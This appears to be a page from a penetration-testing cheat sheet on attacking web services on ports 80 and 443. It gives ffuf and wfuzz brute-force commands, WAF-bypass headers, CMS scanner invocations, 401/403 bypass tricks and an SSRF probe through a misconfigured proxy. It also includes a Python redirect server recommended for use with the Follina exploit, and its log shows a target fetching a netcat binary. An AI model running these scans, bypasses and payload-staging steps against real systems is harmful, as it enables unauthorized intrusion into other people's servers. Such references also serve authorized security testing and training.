80, 443 - HTTP(S)

Brute force directories / files / vhosts

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://target.com -H "Host: FUZZ.target.com"
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://target.com/FUZZ.php -b "PHPSESSID=qotlc86o7lnh9jm51atioq3fbc"

## WAF Bypass using HTTP Headers
ffuf -c -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -H "X-Originating-IP: 127.0.0.1, X-Forwarded-For: 127.0.0.1, X-Remote-IP: 127.0.0.1, X-Remote-Addr: 127.0.0.1, X-Client-IP: 127.0.0.1"

## Find URL-parameters
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u https://target.com/admin/?FUZZ= -b "PHPSESSID=ciku9juef85i9sj1eju4alj375"  -fs 1678

wfuzz: wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ

Initial checks

Server Version

Check if there are known vulnerabilities for the server version that is running. The HTTP headers and cookies of the response could be very useful to identify the technologies and/or version being used.

webanalyze -host https://google.com -crawl 2

Default pages with interesting info

/robots.txt
/sitemap.xml
/crossdomain.xml
/clientaccesspolicy.xml
/.well-known/
Check also comments in the main and secondary pages.

CMS Scanners

If a CMS is used don't forget to run a scanner, maybe something juicy is found:

cmsmap [-f W] -F -d <URL>
wpscan --force update -e --url <URL>
joomscan --ec -u <URL>

401 Forbidden & 403 Unauthorized - Bypass

Automatic fuzzing with byp4xx

40X bypasser in Go. Methods from #bugbountytips, headers, verb tampering, user agents and more.

GitHub - lobuhi/byp4xx: 40X/HTTP bypasser in Go. Features: Verb tampering, headers, #bugbountytips, User-Agents, extensions, default credentials...GitHub

502 Proxy Error - SSRF

If any page responds with 502 Proxy Error, it's probably a bad configured proxy. If you send a HTTP request like: GET https://google.com HTTP/1.1 (with the host header and other common headers), the proxy will try to access google.com and you will have found a SSRF.

Protocol version

If using HTTP/1.1 try to use 1.0 or even test if it supports 2.0.

Other bypass techniques

Get the IP or CNAME of the domain and try contacting it directly.
Change the protocol: from http to https, or for https to http
Go to https://archive.org/web/ and check if in the past that file was worldwide accessible.

Python3 HTTP Redirect

Good script to redirect HTTP traffic, this is useful for bypassing certain 301 Redirect checks or when using MSDT Follina.

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print("""
Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

$ python3 redirect.py 80 http://10.10.14.2:8888
10.10.11.175 - - [19/Aug/2022 12:18:18] "GET / HTTP/1.1" 301 -
10.10.11.175 - - [19/Aug/2022 12:18:20] "GET /nc64.exe HTTP/1.1" 301 -

Last updated 1 year ago

hashtagBrute force directories / files / vhosts

hashtagInitial checks

hashtagServer Version

hashtagDefault pages with interesting info

hashtagCMS Scanners

hashtag401 Forbidden & 403 Unauthorized - Bypass

hashtagAutomatic fuzzing with byp4xx

hashtag502 Proxy Error - SSRF

hashtagProtocol version

hashtagOther bypass techniques

hashtagPython3 HTTP Redirect